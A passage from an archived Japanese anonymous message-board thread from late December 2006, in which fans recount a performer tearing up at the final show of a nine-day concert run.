しうまいオーラスでギチョサン泣いてたよな?
本スレに書いたものの普段泣かないタイプだから驚いた
記憶ではサムライでF風呂にいた時が一番泣いてた

296 :ユー&名無しネ:2006/12/29(金) 23:18:59 ID:M+F1X7K1
>295
ギチョサン泣いてたな
C風呂きた時は泣いた後だったみたいで更に泣かないように堪えてた

297 :ユー&名無しネ:2006/12/29(金) 23:54:54 ID:C66Fk75p
メインステ降りて直ぐに顔を拭ってたのも見た気がするんだが
額に近い目元だったから汗かとオモテたらあれは涙だたのか

298 :ユー&名無しネ:2006/12/30(土) 00:46:51 ID:kQzNq0RJ
普段めったに泣かないイメージだし、ヘンリと共に堪えるのが常だから、自分もレポ読んで驚いた
感極まるものがあったんだな
ギチョサン9日間連続紺乙!

299 :ユー&名無しネ:2006/12/30(土) 01:05:19 ID:aGQ6GUGs
A風呂親子席の前では笑顔で手を振っていたが
通り過ぎたら上げた腕で顔を覆ってたよ

300 :ユー&名無しネ:2006/12/30(土) 02:37:45 ID:Rkpl5s2u
wアンコのロマネでも
イントロ流れて歌いだしで
すぐに顔中がくしゃっとなってた

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)